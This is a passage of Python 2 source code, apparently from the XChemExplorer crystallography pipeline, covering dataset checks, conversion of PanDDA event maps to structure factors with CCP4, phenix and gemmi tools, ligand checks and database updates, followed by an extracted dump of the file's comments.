self.Logfile.insert('{0!s}: atoms in PDB file ({1!s}): {2!s}; atoms in Reference file: {3!s} ===> OK'.format(dataset, self.pdb_style, str(n_atom), str(n_atom_ref)))
if n_atom_ref != n_atom:
self.Logfile.insert('{0!s}: atoms in PDB file ({1!s}): {2!s}; atoms in Reference file: {3!s} ===> ERROR'.format(dataset, self.pdb_style, str(n_atom), str(n_atom_ref)))
mismatched_datasets.append(dataset)
return n_datasets,mismatched_datasets
def get_datasets_which_fit_to_reference_file(self,ref,reference_directory,cluster_dict,allowed_unitcell_difference_percent):
refStructure=XChemUtils.pdbtools(os.path.join(reference_directory,ref+'.pdb'))
symmRef=refStructure.get_spg_number_from_pdb()
ucVolRef=refStructure.calc_unitcell_volume_from_pdb()
cluster_dict[ref]=[]
cluster_dict[ref].append(os.path.join(reference_directory,ref+'.pdb'))
for dataset in glob.glob(os.path.join(self.data_directory,self.pdb_style)):
datasetStructure=XChemUtils.pdbtools(dataset)
symmDataset=datasetStructure.get_spg_number_from_pdb()
ucVolDataset=datasetStructure.calc_unitcell_volume_from_pdb()
if symmDataset == symmRef:
try:
difference=math.fabs(1-(float(ucVolRef)/float(ucVolDataset)))*100
if difference < allowed_unitcell_difference_percent:
sampleID=dataset.replace('/'+self.pdb_style,'')[dataset.replace('/'+self.pdb_style,'').rfind('/')+1:]
cluster_dict[ref].append(sampleID)
except ZeroDivisionError:
continue
return cluster_dict
def remove_dimple_files(self,dataset_list):
for n_datasets,dataset in enumerate(dataset_list):
db_dict={}
if os.path.isfile(os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style)):
os.system('/bin/rm '+os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style))
self.Logfile.insert('{0!s}: removing {1!s}'.format(dataset, self.pdb_style))
db_dict['DimplePathToPDB']=''
db_dict['DimpleRcryst']=''
db_dict['DimpleRfree']=''
db_dict['DimpleResolutionHigh']=''
db_dict['DimpleStatus']='pending'
if os.path.isfile(os.path.join(self.data_directory.replace('*',''),dataset,self.mtz_style)):
os.system('/bin/rm '+os.path.join(self.data_directory.replace('*',''),dataset,self.mtz_style))
self.Logfile.insert('{0!s}: removing {1!s}'.format(dataset, self.mtz_style))
db_dict['DimplePathToMTZ']=''
if db_dict != {}:
self.db.update_data_source(dataset,db_dict)
def analyse_pdb_style(self):
pdb_found=False
for file in glob.glob(os.path.join(self.data_directory,self.pdb_style)):
if os.path.isfile(file):
pdb_found=True
break
if not pdb_found:
self.error_code=1
message=self.warning_messages()
return message
def analyse_mtz_style(self):
mtz_found=False
for file in glob.glob(os.path.join(self.data_directory,self.mtz_style)):
if os.path.isfile(file):
mtz_found=True
break
if not mtz_found:
self.error_code=2
message=self.warning_messages()
return message
def analyse_min_build_dataset(self):
counter=0
for file in glob.glob(os.path.join(self.data_directory,self.mtz_style)):
if os.path.isfile(file):
counter+=1
if counter <= self.min_build_datasets:
self.error_code=3
message=self.warning_messages()
return message
def warning_messages(self):
message=''
if self.error_code==1:
message='PDB file does not exist'
if self.error_code==2:
message='MTZ file does not exist'
if self.error_code==3:
message='Not enough datasets available'
return message
class convert_all_event_maps_in_database(QtCore.QThread):
def __init__(self,initial_model_directory,xce_logfile,datasource):
QtCore.QThread.__init__(self)
self.xce_logfile=xce_logfile
self.Logfile=XChemLog.updateLog(xce_logfile)
self.initial_model_directory=initial_model_directory
self.datasource=datasource
self.db=XChemDB.data_source(datasource)
def run(self):
sqlite = (
'select'
' CrystalName,'
' PANDDA_site_event_map,'
' PANDDA_site_ligand_resname,'
' PANDDA_site_ligand_chain,'
' PANDDA_site_ligand_sequence_number,'
' PANDDA_site_ligand_altLoc '
'from panddaTable '
'where PANDDA_site_event_map not like "event%"'
)
print sqlite
query=self.db.execute_statement(sqlite)
print query
progress_step=1
if len(query) != 0:
progress_step=100/float(len(query))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
for item in query:
print item
xtalID=str(item[0])
event_map=str(item[1])
resname=str(item[2])
chainID=str(item[3])
resseq=str(item[4])
altLoc=str(item[5])
if os.path.isfile(os.path.join(self.initial_model_directory,xtalID,'refine.pdb')):
os.chdir(os.path.join(self.initial_model_directory,xtalID))
self.Logfile.insert('extracting ligand ({0!s},{1!s},{2!s},{3!s}) from refine.pdb'.format(str(resname), str(chainID), str(resseq), str(altLoc)))
XChemUtils.pdbtools(os.path.join(self.initial_model_directory,xtalID,'refine.pdb')).save_specific_ligands_to_pdb(resname,chainID,resseq,altLoc)
if os.path.isfile('ligand_{0!s}_{1!s}_{2!s}_{3!s}.pdb'.format(str(resname), str(chainID), str(resseq), str(altLoc))):
ligand_pdb='ligand_{0!s}_{1!s}_{2!s}_{3!s}.pdb'.format(str(resname), str(chainID), str(resseq), str(altLoc))
print os.path.join(self.initial_model_directory,xtalID,ligand_pdb)
else:
self.Logfile.insert('could not extract ligand; trying next...')
continue
else:
self.Logfile.insert('directory: '+os.path.join(self.initial_model_directory,xtalID)+' -> cannot find refine.pdb; trying next')
continue
if os.path.isfile(os.path.join(self.initial_model_directory,xtalID,'refine.mtz')):
resolution=XChemUtils.mtztools(os.path.join(self.initial_model_directory,xtalID,'refine.mtz')).get_high_resolution_from_mtz()
else:
self.Logfile.insert('directory: '+os.path.join(self.initial_model_directory,xtalID)+' -> cannot find refine.mtz; trying next')
continue
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'eventMap -> SF for '+event_map)
convert_event_map_to_SF(self.initial_model_directory,xtalID,event_map,ligand_pdb,self.xce_logfile,self.datasource,resolution).run()
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
class convert_event_map_to_SF:
def __init__(self,project_directory,xtalID,event_map,ligand_pdb,xce_logfile,db_file,resolution):
self.Logfile=XChemLog.updateLog(xce_logfile)
self.event_map=event_map
if not os.path.isfile(self.event_map):
self.Logfile.insert('cannot find Event map: '+self.event_map)
self.Logfile.insert('cannot convert event_map to structure factors!')
return None
self.project_directory=project_directory
self.xtalID=xtalID
self.event_map=event_map
self.ligand_pdb=ligand_pdb
self.event=event_map[event_map.rfind('/')+1:].replace('.map','').replace('.ccp4','')
self.db=XChemDB.data_source(db_file)
self.resolution=resolution
def run(self):
os.chdir(os.path.join(self.project_directory,self.xtalID))
# remove exisiting mtz file
if os.path.isfile(self.event+'.mtz'):
self.Logfile.insert('removing existing '+self.event+'.mtz')
os.system('/bin/rm '+self.event+'.mtz')
# event maps generated with pandda v0.2 or higher have the same symmetry as the crystal
# but phenix.map_to_structure_facors only accepts maps in spg P1
# therefore map is first expanded to full unit cell and spg of map then set tp p1
# other conversion option like cinvfft give for whatever reason uninterpretable maps
self.convert_map_to_p1()
# run phenix.map_to_structure_factors
self.run_phenix_map_to_structure_factors()
self.remove_and_rename_column_labels()
# check if output files exist
if not os.path.isfile('{0!s}.mtz'.format(self.event)):
self.Logfile.insert('cannot find {0!s}.mtz'.format(self.event))
else:
self.Logfile.insert('conversion successful, {0!s}.mtz exists'.format(self.event))
# update datasource with event_map_mtz information
self.update_database()
def calculate_electron_density_map(self,mtzin):
missing_columns=False
column_dict=XChemUtils.mtztools(mtzin).get_all_columns_as_dict()
if 'FWT' in column_dict['F'] and 'PHWT' in column_dict['PHS']:
labin=' labin F1=FWT PHI=PHWT\n'
elif '2FOFCWT' in column_dict['F'] and 'PH2FOFCWT' in column_dict['PHS']:
labin=' labin F1=2FOFCWT PHI=PH2FOFCWT\n'
else:
missing_columns=True
if not missing_columns:
os.chdir(os.path.join(self.project_directory,self.xtalID))
cmd = (
'fft hklin '+mtzin+' mapout 2fofc.map << EOF\n'
+labin+
'EOF\n'
)
self.Logfile.insert('calculating 2fofc map from '+mtzin)
os.system(cmd)
else:
self.Logfile.insert('cannot calculate 2fofc.map; missing map coefficients')
def prepare_conversion_script(self):
os.chdir(os.path.join(self.project_directory, self.xtalID))
# see also:
# http://www.phaser.cimr.cam.ac.uk/index.php/Using_Electron_Density_as_a_Model
if os.getcwd().startswith('/dls'):
phenix_module='module_load_phenix\n'
else:
phenix_module=''
cmd = (
'#!'+os.getenv('SHELL')+'\n'
'\n'
+phenix_module+
'\n'
'pdbset XYZIN %s XYZOUT mask_ligand.pdb << eof\n' %self.ligand_pdb+
' SPACEGROUP {0!s}\n'.format(self.space_group)+
' CELL {0!s}\n'.format((' '.join(self.unit_cell)))+
' END\n'
'eof\n'
'\n'
'ncsmask XYZIN mask_ligand.pdb MSKOUT mask_ligand.msk << eof\n'
' GRID %s\n' %(' '.join(self.gridElectronDensityMap))+
' RADIUS 10\n'
' PEAK 1\n'
'eof\n'
'\n'
'mapmask MAPIN %s MAPOUT onecell_event_map.map << eof\n' %self.event_map+
' XYZLIM CELL\n'
'eof\n'
'\n'
'maprot MAPIN onecell_event_map.map MSKIN mask_ligand.msk WRKOUT masked_event_map.map << eof\n'
' MODE FROM\n'
' SYMMETRY WORK %s\n' %self.space_group_numberElectronDensityMap+
' AVERAGE\n'
' ROTATE EULER 0 0 0\n'
' TRANSLATE 0 0 0\n'
'eof\n'
'\n'
'mapmask MAPIN masked_event_map.map MAPOUT masked_event_map_fullcell.map << eof\n'
' XYZLIM CELL\n'
' PAD 0.0\n'
'eof\n'
'\n'
'sfall HKLOUT %s.mtz MAPIN masked_event_map_fullcell.map << eof\n' %self.event+
' LABOUT FC=FC_event PHIC=PHIC_event\n'
' MODE SFCALC MAPIN\n'
' RESOLUTION %s\n' %self.resolution+
' END\n'
)
self.Logfile.insert('preparing script for conversion of Event map to SF')
f = open('eventMap2sf.sh','w')
f.write(cmd)
f.close()
os.system('chmod +x eventMap2sf.sh')
def run_conversion_script(self):
self.Logfile.insert('running conversion script...')
os.system('./eventMap2sf.sh')
def convert_map_to_p1(self):
self.Logfile.insert('running mapmask -> converting map to p1...')
cmd = ( '#!'+os.getenv('SHELL')+'\n'
'\n'
'mapmask mapin %s mapout %s_p1.map << eof\n' %(self.event_map,self.event) +
'xyzlin cell\n'
'symmetry p1\n' )
self.Logfile.insert('mapmask command:\n%s' %cmd)
os.system(cmd)
def run_phenix_map_to_structure_factors(self):
if float(self.resolution) < 1.21: # program complains if resolution is 1.2 or higher
self.resolution='1.21'
self.Logfile.insert('running phenix.map_to_structure_factors {0!s}_p1.map d_min={1!s} output_file_name={2!s}_tmp.mtz'.format(self.event, self.resolution, self.event))
os.system('phenix.map_to_structure_factors {0!s}_p1.map d_min={1!s} output_file_name={2!s}_tmp.mtz'.format(self.event, self.resolution, self.event))
def run_cinvfft(self,mtzin):
# mtzin is usually refine.mtz
self.Logfile.insert('running cinvfft -mapin {0!s} -mtzin {1!s} -mtzout {2!s}_tmp.mtz -colout event'.format(self.event_map, mtzin, self.event))
os.system('cinvfft -mapin {0!s} -mtzin {1!s} -mtzout {2!s}_tmp.mtz -colout event'.format(self.event_map, mtzin, self.event))
def remove_and_rename_column_labels(self):
cmd = ( '#!'+os.getenv('SHELL')+'\n'
'\n'
'cad hklin1 %s_tmp.mtz hklout %s.mtz << eof\n' %(self.event,self.event)+
' labin file_number 1 E1=F-obs E2=PHIF\n'
' labout file_number 1 E1=F_ampl E2=PHIF\n'
'eof\n'
'\n' )
self.Logfile.insert('running CAD: new column labels F_ampl,PHIF')
os.system(cmd)
def remove_and_rename_column_labels_after_cinvfft(self):
cmd = ( '#!'+os.getenv('SHELL')+'\n'
'\n'
'cad hklin1 %s_tmp.mtz hklout %s.mtz << eof\n' %(self.event,self.event)+
' labin file_number 1 E1=event.F_phi.F E2=event.F_phi.phi\n'
' labout file_number 1 E1=F_ampl E2=PHIF\n'
'eof\n'
'\n' )
self.Logfile.insert('running CAD: renaming event.F_phi.F -> F_ampl and event.F_phi.phi -> PHIF')
os.system(cmd)
def update_database(self):
sqlite = ( "update panddaTable set "
" PANDDA_site_event_map_mtz = '%s' " %os.path.join(self.project_directory,self.xtalID,self.event+'.mtz')+
" where PANDDA_site_event_map is '{0!s}' ".format(self.event_map)
)
self.db.execute_statement(sqlite)
self.Logfile.insert('updating data source: '+sqlite)
def clean_output_directory(self):
os.system('/bin/rm mask_targetcell.pdb')
os.system('/bin/rm mask_targetcell.msk')
os.system('/bin/rm onecell.map')
os.system('/bin/rm masked_targetcell.map')
os.system('/bin/rm masked_fullcell.map')
os.system('/bin/rm eventMap2sf.sh')
os.system('/bin/rm '+self.ligand_pdb)
class run_pandda_inspect_at_home(QtCore.QThread):
def __init__(self,panddaDir,xce_logfile):
QtCore.QThread.__init__(self)
self.panddaDir=panddaDir
self.Logfile=XChemLog.updateLog(xce_logfile)
def run(self):
os.chdir(os.path.join(self.panddaDir,'processed_datasets'))
progress_step=1
if len(glob.glob('*')) != 0:
progress_step=100/float(len(glob.glob('*')))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
self.Logfile.insert('parsing '+self.panddaDir)
for xtal in sorted(glob.glob('*')):
for files in glob.glob(xtal+'/ligand_files/*'):
if os.path.islink(files):
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'replacing symlink for {0!s} with real file'.format(files))
self.Logfile.insert('replacing symlink for {0!s} with real file'.format(files))
os.system('cp --remove-destination {0!s} {1!s}/ligand_files'.format(os.path.realpath(files), xtal))
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
XChemToolTips.run_pandda_inspect_at_home(self.panddaDir)
class convert_apo_structures_to_mmcif(QtCore.QThread):
def __init__(self,panddaDir,xce_logfile):
QtCore.QThread.__init__(self)
self.panddaDir=panddaDir
self.Logfile=XChemLog.updateLog(xce_logfile)
def sf_convert_environment(self):
pdb_extract_init = ''
if os.path.isdir('/dls'):
pdb_extract_init = 'source /dls/science/groups/i04-1/software/pdb-extract-prod/setup.sh\n'
pdb_extract_init += '/dls/science/groups/i04-1/software/pdb-extract-prod/bin/sf_convert'
else:
pdb_extract_init = 'source ' + os.path.join(os.getenv('XChemExplorer_DIR'),
'pdb_extract/pdb-extract-prod/setup.sh') + '\n'
pdb_extract_init += +os.path.join(os.getenv('XChemExplorer_DIR'),
'pdb_extract/pdb-extract-prod/bin/sf_convert')
return pdb_extract_init
def run(self):
self.Logfile.insert('converting apo structures in pandda directory to mmcif files')
self.Logfile.insert('chanfing to '+self.panddaDir)
progress_step=1
if len(glob.glob('*')) != 0:
progress_step=100/float(len(glob.glob(os.path.join(self.panddaDir,'processed_datasets','*'))))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
pdb_extract_init = self.sf_convert_environment()
self.Logfile.insert('parsing '+self.panddaDir)
for dirs in glob.glob(os.path.join(self.panddaDir,'processed_datasets','*')):
xtal = dirs[dirs.rfind('/')+1:]
self.Logfile.insert('%s: converting %s to mmcif' %(xtal,xtal+'-pandda-input.mtz'))
if os.path.isfile(os.path.join(dirs,xtal+'-pandda-input.mtz')):
if os.path.isfile(os.path.join(dirs,xtal+'_sf.mmcif')):
self.Logfile.insert('%s: %s_sf.mmcif exists; skipping...' %(xtal,xtal))
else:
os.chdir(dirs)
Cmd = (pdb_extract_init +
' -o mmcif'
' -sf %s' % xtal+'-pandda-input.mtz' +
' -out {0!s}_sf.mmcif > {1!s}.sf_mmcif.log'.format(xtal, xtal))
self.Logfile.insert('running command: '+Cmd)
os.system(Cmd)
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
class check_number_of_modelled_ligands(QtCore.QThread):
def __init__(self,project_directory,xce_logfile,db_file):
QtCore.QThread.__init__(self)
self.Logfile=XChemLog.updateLog(xce_logfile)
self.project_directory=project_directory
self.db=XChemDB.data_source(db_file)
self.errorDict={}
def update_errorDict(self,xtal,message):
if xtal not in self.errorDict:
self.errorDict[xtal]=[]
self.errorDict[xtal].append(message)
def insert_new_row_in_panddaTable(self,xtal,ligand,site,dbDict):
resname= site[0]
chain= site[1]
seqnum= site[2]
altLoc= site[3]
x_site= site[5][0]
y_site= site[5][1]
z_site= site[5][2]
resnameSimilarSite= ligand[0]
chainSimilarSite= ligand[1]
seqnumSimilarSite= ligand[2]
siteList=[]
for entry in dbDict[xtal]:
siteList.append(str(entry[0]))
if entry[4] == resnameSimilarSite and entry[5] == chainSimilarSite and entry[6] == seqnumSimilarSite:
eventMap= str(entry[7])
eventMap_mtz= str(entry[8])
initialPDB= str(entry[9])
initialMTZ= str(entry[10])
event_id= str(entry[12])
PanDDApath= str(entry[13])
db_dict={
'PANDDA_site_index': str(int(max(siteList))+1),
'PANDDApath': PanDDApath,
'PANDDA_site_ligand_id': resname+'-'+chain+'-'+seqnum,
'PANDDA_site_ligand_resname': resname,
'PANDDA_site_ligand_chain': chain,
'PANDDA_site_ligand_sequence_number': seqnum,
'PANDDA_site_ligand_altLoc': 'D',
'PANDDA_site_event_index': event_id,
'PANDDA_site_event_map': eventMap,
'PANDDA_site_event_map_mtz': eventMap_mtz,
'PANDDA_site_initial_model': initialPDB,
'PANDDA_site_initial_mtz': initialMTZ,
'PANDDA_site_ligand_placed': 'True',
'PANDDA_site_x': x_site,
'PANDDA_site_y': y_site,
'PANDDA_site_z': z_site }
print xtal,db_dict
def run(self):
self.Logfile.insert('reading modelled ligands from panddaTable')
dbDict={}
sqlite = ( "select "
" CrystalName,"
" PANDDA_site_index,"
" PANDDA_site_x,"
" PANDDA_site_y,"
" PANDDA_site_z,"
" PANDDA_site_ligand_resname,"
" PANDDA_site_ligand_chain,"
" PANDDA_site_ligand_sequence_number,"
" PANDDA_site_event_map,"
" PANDDA_site_event_map_mtz,"
" PANDDA_site_initial_model,"
" PANDDA_site_initial_mtz,"
" RefinementOutcome,"
" PANDDA_site_event_index,"
" PANDDApath "
"from panddaTable " )
dbEntries=self.db.execute_statement(sqlite)
for item in dbEntries:
xtal= str(item[0])
site= str(item[1])
x= str(item[2])
y= str(item[3])
z= str(item[4])
resname= str(item[5])
chain= str(item[6])
seqnum= str(item[7])
eventMap= str(item[8])
eventMap_mtz= str(item[9])
initialPDB= str(item[10])
initialMTZ= str(item[11])
outcome= str(item[12])
event= str(item[13])
PanDDApath= str(item[14])
if xtal not in dbDict:
dbDict[xtal]=[]
dbDict[xtal].append([site,x,y,z,resname,chain,seqnum,eventMap,eventMap_mtz,initialPDB,initialMTZ,outcome,event,PanDDApath])
os.chdir(self.project_directory)
progress_step=1
if len(glob.glob('*')) != 0:
progress_step=100/float(len(glob.glob('*')))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
for xtal in sorted(glob.glob('*')):
if os.path.isfile(os.path.join(xtal,'refine.pdb')):
ligands=XChemUtils.pdbtools(os.path.join(xtal,'refine.pdb')).ligand_details_as_list()
self.Logfile.insert('{0!s}: found file refine.pdb'.format(xtal))
if ligands:
if os.path.isdir(os.path.join(xtal,'xceTmp')):
os.system('/bin/rm -fr {0!s}'.format(os.path.join(xtal,'xceTmp')))
os.mkdir(os.path.join(xtal,'xceTmp'))
else:
self.Logfile.warning('{0!s}: cannot find ligand molecule in refine.pdb; skipping...'.format(xtal))
continue
made_sym_copies=False
ligands_not_in_panddaTable=[]
for n,item in enumerate(ligands):
resnameLIG= item[0]
chainLIG= item[1]
seqnumLIG= item[2]
altLocLIG= item[3]
occupancyLig= item[4]
if altLocLIG.replace(' ','') == '':
self.Logfile.insert(xtal+': found a ligand not modelled with pandda.inspect -> {0!s} {1!s} {2!s}'.format(resnameLIG, chainLIG, seqnumLIG))
residue_xyz = XChemUtils.pdbtools(os.path.join(xtal,'refine.pdb')).get_center_of_gravity_of_residue_ish(item[1],item[2])
ligands[n].append(residue_xyz)
foundLigand=False
if xtal in dbDict:
for entry in dbDict[xtal]:
resnameTable=entry[4]
chainTable=entry[5]
seqnumTable=entry[6]
self.Logfile.insert('panddaTable: {0!s} {1!s} {2!s} {3!s}'.format(xtal, resnameTable, chainTable, seqnumTable))
if resnameLIG == resnameTable and chainLIG == chainTable and seqnumLIG == seqnumTable:
self.Logfile.insert('{0!s}: found ligand in database -> {1!s} {2!s} {3!s}'.format(xtal, resnameTable, chainTable, seqnumTable))
foundLigand=True
if not foundLigand:
self.Logfile.error('{0!s}: did NOT find ligand in database -> {1!s} {2!s} {3!s}'.format(xtal, resnameLIG, chainLIG, seqnumLIG))
ligands_not_in_panddaTable.append([resnameLIG,chainLIG,seqnumLIG,altLocLIG,occupancyLig,residue_xyz])
else:
self.Logfile.warning('ligand in PDB file, but dataset not listed in panddaTable: {0!s} -> {1!s} {2!s} {3!s}'.format(xtal, item[0], item[1], item[2]))
for entry in ligands_not_in_panddaTable:
self.Logfile.error('{0!s}: refine.pdb contains a ligand that is not assigned in the panddaTable: {1!s} {2!s} {3!s} {4!s}'.format(xtal, entry[0], entry[1], entry[2], entry[3]))
for site in ligands_not_in_panddaTable:
for files in glob.glob(os.path.join(self.project_directory,xtal,'xceTmp','ligand_*_*.pdb')):
mol_xyz = XChemUtils.pdbtools(files).get_center_of_gravity_of_molecule_ish()
# now need to check if there is a unassigned entry in panddaTable that is close
for entry in dbDict[xtal]:
distance = XChemUtils.misc().calculate_distance_between_coordinates(mol_xyz[0], mol_xyz[1],mol_xyz[2],entry[1],entry[2], entry[3])
self.Logfile.insert('{0!s}: {1!s} {2!s} {3!s} <---> {4!s} {5!s} {6!s}'.format(xtal, mol_xyz[0], mol_xyz[1], mol_xyz[2], entry[1], entry[2], entry[3]))
self.Logfile.insert('{0!s}: symm equivalent molecule: {1!s}'.format(xtal, files))
self.Logfile.insert('{0!s}: distance: {1!s}'.format(xtal, str(distance)))
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
if self.errorDict != {}:
self.update_errorDict('General','The aforementioned PDB files were automatically changed by XCE!\nPlease check and refine them!!!')
self.emit(QtCore.SIGNAL('show_error_dict'), self.errorDict)
class find_event_map_for_ligand(QtCore.QThread):
def __init__(self,project_directory,xce_logfile,external_software):
QtCore.QThread.__init__(self)
self.Logfile=XChemLog.updateLog(xce_logfile)
self.project_directory=project_directory
self.external_software=external_software
try:
import gemmi
self.Logfile.insert('found gemmi library in ccp4-python')
except ImportError:
self.external_software['gemmi'] = False
self.Logfile.warning('cannot import gemmi; will use phenix.map_to_structure_factors instead')
def run(self):
self.Logfile.insert('======== checking ligand CC in event maps ========')
for dirs in sorted(glob.glob(os.path.join(self.project_directory,'*'))):
xtal = dirs[dirs.rfind('/')+1:]
if os.path.isfile(os.path.join(dirs,'refine.pdb')) and \
os.path.isfile(os.path.join(dirs,'refine.mtz')):
self.Logfile.insert('%s: found refine.pdb' %xtal)
os.chdir(dirs)
try:
p = gemmi.read_structure('refine.pdb')
except:
self.Logfile.error('gemmi library not available')
self.external_software['gemmi'] = False
reso = XChemUtils.mtztools('refine.mtz').get_dmin()
ligList = XChemUtils.pdbtools('refine.pdb').save_residues_with_resname(dirs,'LIG')
self.Logfile.insert('%s: found %s ligands of type LIG in refine.pdb' %(xtal,str(len(ligList))))
for maps in glob.glob(os.path.join(dirs,'*event*.native.ccp4')):
if self.external_software['gemmi']:
self.convert_map_to_sf_with_gemmi(maps,p)
else:
self.expand_map_to_p1(maps)
self.convert_map_to_sf(maps.replace('.ccp4','.P1.ccp4'),reso)
summary = ''
for lig in sorted(ligList):
if self.external_software['gemmi']:
for mtz in sorted(glob.glob(os.path.join(dirs,'*event*.native.mtz'))):
self.get_lig_cc(mtz,lig)
cc = self.check_lig_cc(mtz.replace('.mtz', '_CC.log'))
summary += '%s: %s LIG CC = %s (%s)\n' %(xtal,lig,cc,mtz[mtz.rfind('/')+1:])
else:
for mtz in sorted(glob.glob(os.path.join(dirs,'*event*.native*P1.mtz'))):
self.get_lig_cc(mtz,lig)
cc = self.check_lig_cc(mtz.replace('.mtz', '_CC.log'))
summary += '%s: %s LIG CC = %s (%s)\n' %(xtal,lig,cc,mtz[mtz.rfind('/')+1:])
self.Logfile.insert('\nsummary of CC analysis:\n======================:\n'+summary)
def expand_map_to_p1(self,emap):
self.Logfile.insert('expanding map to P1: %s' %emap)
if os.path.isfile(emap.replace('.ccp4','.P1.ccp4')):
self.Logfile.warning('P1 map exists; skipping...')
return
cmd = ( 'mapmask MAPIN %s MAPOUT %s << eof\n' %(emap,emap.replace('.ccp4','.P1.ccp4'))+
' XYZLIM CELL\n'
' PAD 0.0\n'
' SYMMETRY 1\n'
'eof\n' )
os.system(cmd)
def convert_map_to_sf(self,emap,reso):
self.Logfile.insert('converting ccp4 map to mtz with phenix.map_to_structure_factors: %s' %emap)
if os.path.isfile(emap.replace('.ccp4','.mtz')):
self.Logfile.warning('mtz file of event map exists; skipping...')
return
cmd = ( 'module load phenix\n'
'phenix.map_to_structure_factors %s d_min=%s\n' %(emap,reso)+
'/bin/mv map_to_structure_factors.mtz %s' %emap.replace('.ccp4', '.mtz') )
os.system(cmd)
def get_lig_cc(self,mtz,lig):
self.Logfile.insert('calculating CC for %s in %s' %(lig,mtz))
if os.path.isfile(mtz.replace('.mtz', '_CC.log')):
self.Logfile.warning('logfile of CC analysis exists; skipping...')
return
cmd = ( 'module load phenix\n'
'phenix.get_cc_mtz_pdb %s %s > %s' % (mtz, lig, mtz.replace('.mtz', '_CC.log')) )
os.system(cmd)
def check_lig_cc(self,log):
cc = 'n/a'
if os.path.isfile(log):
for line in open(log):
if line.startswith('local'):
cc = line.split()[len(line.split()) - 1]
else:
self.Logfile.error('logfile does not exist: %s' %log)
return cc
def convert_map_to_sf_with_gemmi(self,emap,p):
self.Logfile.insert('converting ccp4 map to mtz with gemmi map2sf: %s' %emap)
if os.path.isfile(emap.replace('.ccp4','.mtz')):
self.Logfile.warning('mtz file of event map exists; skipping...')
return
cmd = 'gemmi map2sf %s %s FWT PHWT --dmin=%s' %(emap,emap.replace('.ccp4','.mtz'),p.resolution)
self.Logfile.insert('converting map with command:\n' + cmd)
os.system(cmd) | en | 0.659973 | # last edited: 10/08/2017, 10:25 #from XChemUtils import mtztools #def get_names_of_current_clusters(xce_logfile,panddas_directory): # Logfile=XChemLog.updateLog(xce_logfile) # Logfile.insert('parsing {0!s}/cluster_analysis'.format(panddas_directory)) # os.chdir('{0!s}/cluster_analysis'.format(panddas_directory)) # cluster_dict={} # for out_dir in sorted(glob.glob('*')): # if os.path.isdir(out_dir): # cluster_dict[out_dir]=[] # found_first_pdb=False # for folder in glob.glob(os.path.join(out_dir,'pdbs','*')): # xtal=folder[folder.rfind('/')+1:] # if not found_first_pdb: # if os.path.isfile(os.path.join(panddas_directory,'cluster_analysis',out_dir,'pdbs',xtal,xtal+'.pdb') ): # cluster_dict[out_dir].append(os.path.join(panddas_directory,'cluster_analysis',out_dir,'pdbs',xtal,xtal+'.pdb')) # found_first_pdb=True # cluster_dict[out_dir].append(xtal) # return cluster_dict # self.initial_model_directory=initial_model_directory # self.db.create_missing_columns() # self.db_list=self.db.get_empty_db_dict() # self.external_software=XChemUtils.external_software(xce_logfile).check() # self.xce_logfile=xce_logfile # self.already_exported_models=[] # find all folders with *-pandda-model.pdb # if only NEW models shall be exported, check timestamps # find pandda_inspect_events.csv and read in as pandas dataframe # find out ligand event map relationship # convert event map to SF # move existing event maps in project directory to old folder # copy event MTZ to project directory # copy pandda-model to project directory # make map from MTZ and cut around ligand # update database # refine models # some time in the future... # create folder for new refinement cycle # compoundID=str(item[1]) ####################################################### # create folder for new refinement cycle # first find which samples are in interesting datasets and have a model # and determine the timestamp # now get these models from the database and compare the datestamps # Note: only get the models that underwent some form of refinement, # because only if the model was updated in pandda.inspect will it be exported and refined # compare timestamps and only export the ones where the timestamp of the file is newer than the one in the DB # this will be raised if timestamp is not properly formatted; # which will usually be the case when respective field in database is blank # these are hopefully legacy cases which are from before this extensive check was introduced (13/01/2017) # update the DB: # set timestamp to current timestamp of file and set RefinementOutcome to '2-pandda...' # v1.3.8.2 - removed option to update database only # if not self.update_datasource_only: # if not self.update_datasource_only: # sample_list=self.db.execute_statement("select CrystalName,CompoundCode from mainTable where RefinementOutcome='2 - PANDDA model';") # for item in sample_list: # xtal=str(item[0]) # compoundID=str(item[1]) ####################################################### # create folder for new refinement cycle # elif xtal in os.path.join(self.panddas_directory,'processed_datasets',xtal,'modelled_structures', # '{}-pandda-model.pdb'.format(xtal)): # self.Logfile.insert('{}: cannot start refinement because {}'.format(xtal,xtal) + # ' does not have a modelled structure. Check whether you expect this dataset to ' + # ' have a modelled structure, compare pandda.inspect and datasource,' # ' then tell XCHEMBB ') # first make a note of all the datasets which were used in pandda directory # do the same as before, but look for rejected datasets # check if EVENT map exists in project directory # initial pandda model and mtz file # find apo structures which were used # XXX missing XXX # this is necessary, otherwise RefinementOutcome will be reset for samples that are actually already in refinement # finally find all samples which do not have a pandda hit # DimplePANDDAhit # for xtal in glob.glob('*'): # if xtal not in pandda_hit_list: # self.Logfile.insert(xtal+': not in interesting_datasets; updating database...') # self.db.execute_statement("update mainTable set DimplePANDDAhit = 'False' where CrystalName is '{0!s}'".format(xtal)) # first find which samples are in interesting datasets and have a model # and determine the timestamp # now get these models from the database and compare the datestamps # Note: only get the models that underwent some form of refinement, # because only if the model was updated in pandda.inspect will it be exported and refined # compare timestamps and only export the ones where the timestamp of the file is newer than the one in the DB # this will be raised if timestamp is not properly formatted; # which will usually be the case when respective field in database is blank # these are hopefully legacy cases which are from before this extensive check was introduced (13/01/2017) # update the DB: # set timestamp to current timestamp of file and set RefinementOutcome to '2-pandda...' # 'source '+os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-sh')+'\n' # print self.reference_dir # print self.filter_pdb # how to run pandda.analyse on large datasets # # 1) Run the normal pandda command, with the new setting, e.g. # pandda.analyse data_dirs=... max_new_datasets=500 # This will do the analysis on the first 500 datasets and build the statistical maps - just as normal. # # 2) Run pandda with the same command: # pandda.analyse data_dirs=... max_new_datasets=500 # This will add 500 new datasets, and 